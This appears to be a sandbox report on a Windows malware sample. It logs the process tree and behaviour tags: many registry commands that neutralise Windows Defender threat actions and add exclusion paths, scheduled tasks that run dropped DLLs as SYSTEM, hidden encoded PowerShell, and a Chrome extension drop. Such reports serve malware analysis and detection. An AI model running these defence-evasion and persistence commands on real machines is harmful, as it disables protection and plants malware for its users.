- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4232
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4948
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:3048
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4184
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\INpMKNzTQJjxsUtEmkR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\INpMKNzTQJjxsUtEmkR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LTyiovagU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LTyiovagU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XPfigSyVaogU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XPfigSyVaogU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qRkTYBxtrfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qRkTYBxtrfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wDCcPjpnCfSmC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wDCcPjpnCfSmC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UsKKcqxPjoDAieVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UsKKcqxPjoDAieVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\oDSkGUOyYCDtYjDrm\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\oDSkGUOyYCDtYjDrm\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\NVcskukcjVmXKoJK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\NVcskukcjVmXKoJK\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\INpMKNzTQJjxsUtEmkR" /t REG_DWORD /d 0 /reg:323⤵PID:1276
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\INpMKNzTQJjxsUtEmkR" /t REG_DWORD /d 0 /reg:324⤵PID:4516
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\INpMKNzTQJjxsUtEmkR" /t REG_DWORD /d 0 /reg:643⤵PID:2220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LTyiovagU" /t REG_DWORD /d 0 /reg:323⤵PID:792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LTyiovagU" /t REG_DWORD /d 0 /reg:643⤵PID:3560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XPfigSyVaogU2" /t REG_DWORD /d 0 /reg:323⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XPfigSyVaogU2" /t REG_DWORD /d 0 /reg:643⤵PID:5116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qRkTYBxtrfUn" /t REG_DWORD /d 0 /reg:323⤵PID:2136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qRkTYBxtrfUn" /t REG_DWORD /d 0 /reg:643⤵PID:4060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wDCcPjpnCfSmC" /t REG_DWORD /d 0 /reg:323⤵PID:4460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wDCcPjpnCfSmC" /t REG_DWORD /d 0 /reg:643⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UsKKcqxPjoDAieVB /t REG_DWORD /d 0 /reg:323⤵PID:4932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UsKKcqxPjoDAieVB /t REG_DWORD /d 0 /reg:643⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\oDSkGUOyYCDtYjDrm /t REG_DWORD /d 0 /reg:323⤵PID:4640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\oDSkGUOyYCDtYjDrm /t REG_DWORD /d 0 /reg:643⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\NVcskukcjVmXKoJK /t REG_DWORD /d 0 /reg:323⤵PID:1344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\NVcskukcjVmXKoJK /t REG_DWORD /d 0 /reg:643⤵PID:4692
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMhkYHzyf" /SC once /ST 06:17:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMhkYHzyf"2⤵PID:3564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMhkYHzyf"2⤵PID:1812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aQBnzvyVxwkajhGDA" /SC once /ST 05:34:22 /RU "SYSTEM" /TR "\"C:\Windows\Temp\NVcskukcjVmXKoJK\XMjxMgteWTnBmkX\LqlkCgD.exe\" H0 /wesite_idpvU 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aQBnzvyVxwkajhGDA"2⤵PID:4176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1820
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2640
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4256
-
C:\Windows\Temp\NVcskukcjVmXKoJK\XMjxMgteWTnBmkX\LqlkCgD.exeC:\Windows\Temp\NVcskukcjVmXKoJK\XMjxMgteWTnBmkX\LqlkCgD.exe H0 /wesite_idpvU 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5008 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bIGGRJeqyVXrftfqbU"2⤵PID:892
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4208
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4236
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:272
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\LTyiovagU\XKIVjM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OGyQYCCLNvuKRdK" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OGyQYCCLNvuKRdK2" /F /xml "C:\Program Files (x86)\LTyiovagU\gSznfeU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OGyQYCCLNvuKRdK"2⤵PID:4168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OGyQYCCLNvuKRdK"2⤵PID:4200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lHoIBuKTaXCyzQ" /F /xml "C:\Program Files (x86)\XPfigSyVaogU2\YKGlgvP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hPYrvJiqoRnje2" /F /xml "C:\ProgramData\UsKKcqxPjoDAieVB\NdxqUcY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RDNdVBdbADkWKfwnn2" /F /xml "C:\Program Files (x86)\INpMKNzTQJjxsUtEmkR\mjnYlod.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XnUJWRHgOcqFOHfxPVE2" /F /xml "C:\Program Files (x86)\wDCcPjpnCfSmC\skOctYr.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2364
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dKyZitVvSfuUxAckm" /SC once /ST 01:11:01 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\NVcskukcjVmXKoJK\icZUUXzy\aWetfRe.dll\",#1 /bIsite_idSTB 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "dKyZitVvSfuUxAckm"2⤵PID:2068
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3580
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3260
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aQBnzvyVxwkajhGDA"2⤵PID:4936
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4948
-
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\NVcskukcjVmXKoJK\icZUUXzy\aWetfRe.dll",#1 /bIsite_idSTB 5254031⤵PID:1048
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\NVcskukcjVmXKoJK\icZUUXzy\aWetfRe.dll",#1 /bIsite_idSTB 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3916 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dKyZitVvSfuUxAckm"3⤵PID:3644
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53831b00fbed6cc0991830154128ce222
SHA19e8d85ea9be9f1f26ac62806dd753136624fbae9
SHA256ed2c5fc867b658318e34d1bb7fbcd9530cc65fb14342038d002f637568751685
